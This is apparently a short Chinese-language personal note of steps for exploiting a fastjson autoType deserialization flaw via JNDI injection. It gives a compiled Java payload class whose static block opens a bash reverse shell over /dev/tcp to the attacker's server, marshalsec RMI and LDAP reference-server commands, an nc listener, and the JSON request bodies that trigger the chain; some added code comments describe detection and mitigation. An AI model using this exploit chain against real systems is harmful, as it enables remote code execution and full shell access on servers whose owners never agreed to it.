目錄
如下文章說得很不詳細,只是用於記錄我的步驟,初次利用的人,建議找別的博客文章學習。
-
準備一台公網服務器
cd test
python -m SimpleHTTPServer 8888 -
javac Exploit.java
裡面的 IP 和端口改成你的
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;
/**
 * The class that the JNDI reference servers listed on this page (RMIRefServer /
 * LDAPRefServer, both pointing at {@code http://.../#Exploit}) presumably hand out to
 * a JVM that follows the reference. Everything it does happens in the static
 * initializer, so the class only has to be loaded — no method is ever invoked.
 *
 * Defender's view: the observable effects are a {@code cmd.exe} / {@code bash} child
 * process of the java process and, on non-Windows hosts, an outbound TCP connection
 * to port 7778. The primary mitigation on the target side is not letting JNDI
 * lookups load remote code at all: current JDKs ship with
 * {@code com.sun.jndi.rmi.object.trustURLCodebase} and
 * {@code com.sun.jndi.ldap.object.trustURLCodebase} set to {@code false}, and those
 * defaults should not be re-enabled. The JSON bodies further down the page look like
 * fastjson autoType payloads (TODO confirm the library), so keeping autoType
 * disabled / the parser up to date removes the entry point as well.
 */
public class Exploit{
// No-op constructor; present only so that main() below can instantiate the class.
public Exploit() {}
// Static initializer: runs once when the JVM initializes this class, before main()
// and before any constructor. This is the only place with real behaviour.
static
{
try {
// Command is chosen by OS. On Windows it is calc.exe — a visible
// proof-of-execution marker with no network activity. Elsewhere it starts an
// interactive bash with stdin/stdout/stderr redirected over /dev/tcp to the host
// substituted for 【公網IP】 on port 7778, i.e. a reverse shell to the
// `nc -lvp 7778` listener mentioned later on the page. The shell runs with the
// privileges of the JVM process that loaded this class.
String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
? new String[]{"cmd.exe","/c", "calc.exe"}
: new String[]{"bash", "-c", "/bin/bash -i >& /dev/tcp/【公網IP】/7778 0>&1"};
// Spawns the child process; from the host's point of view this is the
// process-tree anomaly (java -> bash/cmd.exe) worth alerting on.
Runtime.getRuntime().exec(cmds);
} catch (Exception e) {
// Any failure is only printed to stderr and never propagated, so class
// initialization still completes successfully.
e.printStackTrace();
}
}
/**
 * Local smoke test only (run after {@code javac Exploit.java}). The created
 * instance is never used; by the time main() is entered the static block has
 * already run.
 *
 * @param args ignored
 */
public static void main(String[] args) {
Exploit e = new Exploit();
System.out.println("hello world");
}
}
- 上傳到你的公網服務器
Exploit.class
marshalsec-0.0.3-SNAPSHOT-all.jar
# 有2個協議
RMI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://【公網IP】/#Exploit 7776
LDAP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://【公網IP】/#Exploit 7776
- 接受反彈shell的地方
nc -lvp 7778
- http請求
# ldap
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公網IP】:7776/Exploit","autoCommit":true}}
# rmi
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公網IP】:7776/Exploit","autoCommit":true}}